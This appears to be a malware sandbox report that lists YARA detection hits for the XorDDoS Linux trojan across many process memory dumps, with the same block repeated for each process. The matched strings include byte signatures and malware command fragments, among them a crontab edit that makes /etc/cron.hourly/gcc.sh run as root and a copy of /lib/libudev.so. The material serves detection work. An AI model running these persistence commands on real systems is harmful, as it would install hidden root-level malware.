6233.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6512.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6480.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6480.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6480.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6480.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6480.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6480.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6480.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6367.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6285.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6454.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6300.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6300.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6300.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6300.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6300.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6300.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6300.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6274.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6426.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6426.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6426.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6426.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6426.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6426.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6426.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6331.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6331.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6331.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6331.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6331.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6331.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
